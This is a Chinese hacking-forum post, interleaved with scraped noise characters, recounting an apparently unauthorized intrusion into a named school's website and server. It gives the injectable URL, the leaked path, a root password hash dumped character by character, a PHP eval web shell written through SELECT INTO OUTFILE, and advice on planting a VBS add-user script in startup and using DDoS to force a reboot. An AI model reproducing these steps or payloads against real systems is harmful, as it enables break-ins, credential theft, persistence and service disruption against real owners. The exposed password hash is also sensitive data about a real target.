友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
; Z5 x! @; x" c* A发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
7 U4 a- Q0 h; I+ n3 t7 Z9 R

& A; m4 D9 H2 |6 K1 @  @, J7 _
8 a* j# e# K6 L0 a; C6 f常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

4 k5 C7 W8 B; W- X0 X那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
9 R! c% v% b: p2 e9 G4 o
; ^( z- j9 @. d6 U试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
: |& b1 d' G* x: g4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
+ ^! p! N, [  e5 F6./phpmyadmin/libraries/lect_lang.lib.php  
) E& h+ x$ C+ Y7./phpmyadmin/libraries/mcrypt.lib.php   
* \2 z# j0 i- [" ~; x8./phpmyadmin/libraries/export/xls.php  
' W4 K. ]+ D$ D# v
均不行...........................
2 ~8 ]* s# T1 L: ]; ~
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
8 F' Z$ R, o/ K2 v" G
7 @9 ~5 s, A# ^8 S4 A权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
+ y, U. M! h' y. V3 y3 c
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

4 V' \* H6 b4 z9 D自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：
" r- Q: q3 h2 A" _1 W2 `
17---- r(0072)
/ E# `& B. d4 Z0 F18---- o(006f)
19---- o(006f)
20---- t(0074)
6 p8 I5 n2 X8 a& g( v21---- *(002a)
22---- 8(0038)
23---- 2(0032)
24---- E(0045)
- w9 Y: b: [$ J. F# \9 W25---- 1(0031)
26---- C(0043)
27---- 5(0035)
( e1 L; ~& H+ W2 J28---- 8(0038)
' e6 c0 Y: z- B4 f1 u. ^9 Q# Y0 G' z29---- 2(0032)
30---- 8(0038)
3 z9 p) |# q' d: D3 n31---- A(0041)
  y5 t! O: D! m; e/ R7 |& u2 C32---- 9(0039)
. o; W  v6 u3 S8 Q- V* C33---- B(0042)
& {- W, P( o+ b34---- 5(0035)
35---- 4(0034)
. p* j) l$ a0 N0 L36---- 8(0038)
/ K8 s* B6 g* `3 p# I2 l& b1 P! A37---- 6(0036)
/ _1 K! d9 z6 Z- A: b38---- 4(0034)
39---- 9(0039)
- n7 z6 ^% O; {9 i% ~9 p40---- 1(0031)
. {: h6 \8 k4 [5 o, S$ t- j) b  ?1 `41---- 1(0031)
" P5 j3 ~/ h% Z42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
: J$ d# w* c& F% c4 q( ]46---- 8(0038)
47---- F(0046)
48---- F(0046)
49---- 4(0034)
3 g+ I7 ?  C8 G9 |2 e% u50---- F(0046)
; H7 d( V( s$ q% |51---- 0(0030)
% ~- Y2 r  \2 W7 s; B) t  U52---- 3(0033)
- ?* n6 k; w; f( w/ f7 l53---- 2(0032)
# p+ w6 F( W! ^. N. n54---- A(0041)
# _, Z. ^; \3 c1 A: Y55---- 4(0034)
56---- A(0041)
57---- B(0042)
1 O0 k, q# P' b9 V1 E5 s58---- *(0044)
59---- *(0035)
60---- *(0041)
. u2 e8 l- D# H. w" ~6 W61---- *0032)

解密后成功登陆phpmyamin
" t: R/ ?4 i6 Q5 Y" w) T$ ~                          

% D- }& W9 p9 J* j                             

: W3 ^% z. d$ h2 r8 Z* y. O* h找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

# e/ Q6 e2 n6 F+ `, r3 \成功执行，拿下shell，菜刀连接：
; `$ R. [4 e9 A3 Q! A
服务器不支持asp,aspx,php提权无果...................

0 J- X" _7 T9 ^/ e, V8 h9 `. `但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
$ l; b- z+ I' v注释     管理员对计算机/域有不受限制的完全访问权

; S/ ~9 d! r  Q# f

成员

-------------------------------------------------------------------------------
admin
$ t3 q4 y3 I8 y+ |Administrator
  v  }9 C) O, N! Xslipper$
sqluser
命令成功完成。
1 v& Z) M. J0 t) j
7 `* Q) u' S1 D$ X服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................

      

angel